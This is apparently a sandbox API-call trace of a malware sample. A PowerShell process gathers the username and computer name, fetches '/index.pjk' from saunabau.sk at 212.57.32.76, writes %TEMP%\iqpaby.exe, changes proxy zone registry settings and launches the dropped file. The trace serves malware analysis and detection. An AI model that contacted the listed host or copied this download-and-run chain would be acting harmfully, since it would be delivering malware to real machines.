Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, kernel32.dll, 757b0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, version.dll, 74480000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, mscoree.dll, 72900000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, advapi32.dll, 755d0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 3797dc, 0, %windir%\assembly\gac_msil\system\2.0.0.0__b77a5c561934e089\psapi.dll, 0 ) Return: c0000135	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, psapi.dll, 779e0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 3797dc, 0, %windir%\assembly\gac_msil\system\2.0.0.0__b77a5c561934e089\ntdll.dll, 0 ) Return: c0000135	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, ntdll.dll, 77a10000 ) Return: 0	2520	2552
Call Systeminfo API	API Name: NtQuerySystemInformation Args: ( 5, , 131072, 45560 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, user32.dll, 75b90000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, advapi32.dll, 755d0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, cryptsp.dll, 75330000 ) Return: 0	2520	2552
Call System API	API Name: CryptExportKey Args: ( 2eefc8, 0, 6, 0, 0, 19ea20 ) Return: 1	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 38adbc, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll, 6e440000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e3358c, 0, %windir%\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4f68cd04686e5dc5a55070d112d44bdf\microsoft.powershell.commands.diagnostics.ni.dll, 72740000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e34cec, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll, 728b0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e371dc, 0, %windir%\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\ee28a075665b6bc23b6dae56903d431d\microsoft.wsman.management.ni.dll, 726b0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e3e1dc, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll, 70e10000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e3e6a4, 0, %windir%\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll, 67aa0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, mscoree.dll, 72900000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e40c1c, 0, %windir%\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\3008a05e2928e2c1d856cc34e0422c17\microsoft.powershell.commands.utility.ni.dll, 6e2a0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e40c1c, 0, %windir%\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\8df695fb80187f65208d87229e81e8a2\microsoft.powershell.commands.management.ni.dll, 70d40000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e444c4, 0, %windir%\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\8ce205027e30804d1b2deaffa0582735\microsoft.powershell.security.ni.dll, 6e270000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e445bc, 0, %windir%\microsoft.net\framework\v2.0.50727\culture.dll, 60340000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, kernel32.dll, 757b0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 38adbc, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll, 6dd30000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4cc1c, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll, 6dc20000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4df74, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll, 6db00000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, shfolder.dll, 70f10000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 3797dc, 0, %windir%\assembly\gac_32\mscorlib\2.0.0.0__b77a5c561934e089\secur32.dll, 0 ) Return: c0000135	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e287b4, 0, secur32.dll, 72370000 ) Return: 0	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e287b4, 0, sspicli.dll, 75570000 ) Return: 0	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetComputerNameW Args: ( NeilOffice, 19e7b8 ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetComputerNameW Args: ( NeilOffice, 19e7fc ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19eaf8 ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 10002, Administrator, 19eb00 ) Return: 1	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 38adbc, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll, 6d4a0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e5cb5c, 0, %windir%\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll, 64e70000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e287b4, 0, %windir%\microsoft.net\framework\v2.0.50727\mscorjit.dll, 6d440000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e60494, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll, 6d340000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 3797dc, 0, %windir%\assembly\gac_msil\system\2.0.0.0__b77a5c561934e089\rasapi32.dll, 0 ) Return: c0000135	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, rasapi32.dll, 72ba0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, rtutils.dll, 72b70000 ) Return: 0	2520	2552
Add Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32\ Value: None	2520	2552
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32\EnableFileTracing Value: 0	2520	2552
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32\EnableConsoleTracing Value: 0	2520	2552
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32\FileTracingMask Value: ffff0000	2520	2552
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32\ConsoleTracingMask Value: ffff0000	2520	2552
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32\MaxFileSize Value: 100000	2520	2552
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32\FileDirectory Value: %windir%\tracing	2520	2552
Call Service API	API Name: OpenServiceW Args: ( 2e66390, RASMAN, 4 ) Return: 2e662c8	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 3797dc, 0, %windir%\assembly\gac_msil\system\2.0.0.0__b77a5c561934e089\ws2_32.dll, 0 ) Return: c0000135	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, ws2_32.dll, 75f70000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\mswsock.dll, 74900000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\wshtcpip.dll, 74f60000 ) Return: 0	2520	2552
Call Network API	API Name: socket Args: ( 2, 2, 0 ) Return: 510	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\mswsock.dll, 74900000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\wship6.dll, 72fc0000 ) Return: 0	2520	2552
Call Network API	API Name: socket Args: ( 23, 2, 0 ) Return: 510	2520	2552
Call Systeminfo API	API Name: GetComputerNameW Args: ( NeilOffice, 3a3bd50 ) Return: 1	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 3a3f048, 0, Global\.net clr networking ) Return: 518	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 3a3f32c, 0, Global\.net clr networking ) Return: 0	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 3a3fd40, 0, Global\.net clr networking ) Return: 518	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 3a405e4, 0, Global\.net clr networking ) Return: 518	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 3a40e8c, 0, Global\.net clr networking ) Return: 518	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 3a4172c, 0, Global\.net clr networking ) Return: 518	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 3a41fc8, 0, Global\.net clr networking ) Return: 518	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 3a42870, 0, Global\.net clr networking ) Return: 518	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 3a430f4, 0, Global\.net clr networking ) Return: 518	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 3a43988, 0, Global\.net clr networking ) Return: 518	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 3a44214, 0, Global\.net clr networking ) Return: 518	2520	2552
Call Network API	API Name: socket Args: ( 2, 2, 0 ) Return: 518	2520	2552
Call Network API	API Name: socket Args: ( 23, 2, 0 ) Return: 528	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, rasman.dll, 72b80000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, rtutils.dll, 72b70000 ) Return: 0	2520	2552
Add Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS\ Value: None	2520	2552
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS\EnableFileTracing Value: 0	2520	2552
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS\EnableConsoleTracing Value: 0	2520	2552
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS\FileTracingMask Value: ffff0000	2520	2552
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS\ConsoleTracingMask Value: ffff0000	2520	2552
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS\MaxFileSize Value: 100000	2520	2552
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS\FileDirectory Value: %windir%\tracing	2520	2552
Call Service API	API Name: OpenServiceA Args: ( 2e7fe38, rasman, 4 ) Return: 2e7fe10	2520	2552
Call Service API	API Name: OpenServiceA Args: ( 2e7fe10, RASMAN, 4 ) Return: 2e7fed8	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 3797dc, 0, %windir%\assembly\gac_msil\system\2.0.0.0__b77a5c561934e089\winhttp.dll, 0 ) Return: c0000135	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, winhttp.dll, 730c0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, shlwapi.dll, 75a00000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, iphlpapi.dll, 74850000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, dhcpcsvc6.dll, 72dc0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, iphlpapi.dll, 74850000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, dhcpcsvc.dll, 72ff0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, iphlpapi.dll, 74850000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, ntdll.dll, 77a10000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, advapi32.dll, 755d0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, winhttp.dll, 730c0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, ws2_32.dll, 75f70000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, ws2_32.dll, 75f70000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, kernel32.dll, 757b0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, sspicli.dll, 75570000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, cryptsp.dll, 75330000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, credssp.dll, 70d30000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, rpcrt4.dll, 75aa0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, ole32.dll, 77130000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, nsi.dll, 75a90000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, cfgmgr32.dll, 770e0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, dhcpcsvc.dll, 72ff0000 ) Return: 0	2520	2552
Call Network API	API Name: socket Args: ( 2, 2, 0 ) Return: 5cc	2520	2552
Call Network API	API Name: socket Args: ( 23, 2, 0 ) Return: 5cc	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\mswsock.dll, 74900000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, dnsapi.dll, 74880000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, iphlpapi.dll, 74850000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, rpcrt4.dll, 75aa0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, rasadhlp.dll, 72b50000 ) Return: 0	2520	2552
Call Network API	API Name: socket Args: ( 23, 2, 0 ) Return: 5cc	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 3797dc, 0, %windir%\assembly\gac_msil\system\2.0.0.0__b77a5c561934e089\iphlpapi.dll, 0 ) Return: c0000135	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, iphlpapi.dll, 74850000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, dnsapi.dll, 74880000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, iphlpapi.dll, 74850000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, iphlpapi.dll, 74850000 ) Return: 0	2520	2552
Call Network API	API Name: socket Args: ( 2, 1, 6 ) Return: 5d8	2520	2552
Call Network API	API Name: socket Args: ( 23, 1, 6 ) Return: 5d4	2520	2552
Call Network API	API Name: socket Args: ( 2, 2, 0 ) Return: 5dc	2520	2552
Call Network API	API Name: socket Args: ( 23, 2, 0 ) Return: 5dc	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\fwpuclnt.dll, 72ad0000 ) Return: 0	2520	2552
Call Network API	API Name: socket Args: ( 23, 2, 0 ) Return: 5e4	2520	2552
Call Network API	API Name: socket Args: ( 2, 2, 0 ) Return: 5e4	2520	2552
Call Network API	API Name: socket Args: ( 23, 2, 0 ) Return: 5ec	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\nlaapi.dll, 74f50000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\napinsp.dll, 748f0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\pnrpnsp.dll, 748d0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\pnrpnsp.dll, 748d0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\winrnr.dll, 74870000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, ws2_32.dll, 75f70000 ) Return: 0	2520	2552
Call Network API	API Name: connect Args: ( 5d8, 212.57.32.76:80, 16 ) Return: 0	2520	2552
Call Network API	API Name: send Args: ( 5d8, GET /index.pjk HTTP/1.1\r\nHost: saunabau.sk\r\nConnection: Keep-Alive\r\n\r\n, 70, 0 ) Return: 70	2520	2552
Add File	Path: %TEMP%\iqpaby.exe Type: VSDT_EXE_W32	2520	2552
Write File	Path: %TEMP%\iqpaby.exe Type: VSDT_EXE_W32	2520	2552
Call Window API	API Name: CreateWindowExW Args: ( 0, c03b, OleMainThreadWndName, 88000000, 80000000, 80000000, 80000000, 80000000, fffffffd, 0, 77130000, 0 ) Return: 5001c	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 3799e4, 0, %windir%\assembly\gac_msil\system\2.0.0.0__b77a5c561934e089\shell32.dll, 0 ) Return: c0000135	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, shell32.dll, 76400000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e96514, 0, %windir%\syswow64\urlmon.dll, 758c0000 ) Return: 0	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 10002, Administrator, 6bdeab0 ) Return: 1	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, shell32.dll, 76400000 ) Return: 0	2520	2552
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass Value: 1	2520	2552
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName Value: 1	2520	2552
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet Value: 1	2520	2552
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect Value: 0	2520	2552
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass Value: 1	2520	2552
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName Value: 1	2520	2552
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet Value: 1	2520	2552
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect Value: 0	2520	2552
Call Thread API	API Name: NtGetContextThread Args: ( 956, 6bddda8 ) Return: 0	2520	2552
Call Process API	API Name: CreateProcessW Args: ( %TEMP%\iqpaby.exe, "%TEMP%\iqpaby.exe", , , , , , %WorkingDir%, , Process:2644:%TEMP%\iqpaby.exe ) Return: 1	2520	2552
Call Window API	API Name: DestroyWindow Args: ( 5001c ) Return: 1	2520	2552
Call System API	API Name: EnumProcesses Args: () Return: 1	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, mscoree.dll, 72900000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e98f14, 0, %windir%\microsoft.net\framework\v2.0.50727\diasymreader.dll, 5e3a0000 ) Return: 0	2520	2552
Call Filesystem API	API Name: NtReadFile Args: ( 3a0, , , , , , 200, , ) Return: 0	2520	2552
Call Filesystem API	API Name: NtReadFile Args: ( 3a0, , , , , , 200, , ) Return: 0	2520	2552
Call Filesystem API	API Name: NtReadFile Args: ( 3a0, , , , , , 200, , ) Return: 0	2520	2552
Call Filesystem API	API Name: NtReadFile Args: ( 3a0, , , , , , 200, , ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, cryptbase.dll, 75560000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, gdi32.dll, 75fc0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 5e79e4, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0	2552	2644
Call Systeminfo API	API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19ebc0 ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetUserNameExW Args: ( 10002, Administrator, 19ebc8 ) Return: 1	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 5e79e4, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 5e79e4, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 5e79e4, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0	2552	2644
Call Window API	API Name: CreateWindowExW Args: ( 0, c03b, OleMainThreadWndName, 88000000, 80000000, 80000000, 80000000, 80000000, fffffffd, 0, 77130000, 0 ) Return: 6001c	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, shfolder, 70f10000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, ole32.dll, 77130000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, ole32.dll, 77130000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, comctl32.dll, 72de0000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, comctl32.dll, 72de0000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, oleaut32.dll, 77050000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, advapi32.dll, 755d0000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, clbcatq.dll, 75e90000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, mscoree.dll, 72900000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, mscoree.dll, 72900000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, mscoree.dll, 72900000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, mscoree.dll, 72900000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, mscoree.dll, 72900000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, mscoree.dll, 72900000 ) Return: 0	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 37ca744, 0, Global\.net clr networking ) Return: 48c	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 37caa60, 0, Global\.net clr networking ) Return: 48c	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 37cad7c, 0, Global\.net clr networking ) Return: 48c	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 37cb098, 0, Global\.net clr networking ) Return: 48c	2520	2552
Call Mutex API	API Name: CreateMutexW Args: ( 37cb3b4, 0, Global\.net clr networking ) Return: 48c	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, advapi32.dll, 755d0000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 630f74, 0, %windir%\system32\propsys.dll, 72cc0000 ) Return: 0	2552	2644
Call Filesystem API	API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData\Local\Microsoft\Windows\Caches, 0 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, ntmarta.dll, 74810000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, advapi32.dll, 755d0000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, shell32.dll, 76400000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, profapi.dll, 72dd0000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, apphelp.dll, 72c70000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 2efcd5c, 0, %windir%\system32\shdocvw.dll, 6d1d0000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 2efcd5c, 0, %windir%\system32\shell32.dll, 76400000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, propsys.dll, 72cc0000 ) Return: 0	2552	2644
Call System API	API Name: LdrLoadDll Args: ( 56202c, 0, oleaut32.dll, 77050000 ) Return: 0	2552	2644
Call Filesystem API	API Name: CreateDirectoryW Args: ( %TEMP%\, 0 ) Return: 0	2552	2644
Add File	Path: %TEMP%\nsu5A20.tmp Type: VSDT_EMPTY	2552	2644
Delete File	Path: %TEMP%\nsu5A20.tmp Type: VSDT_EMPTY	2552	2644
Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
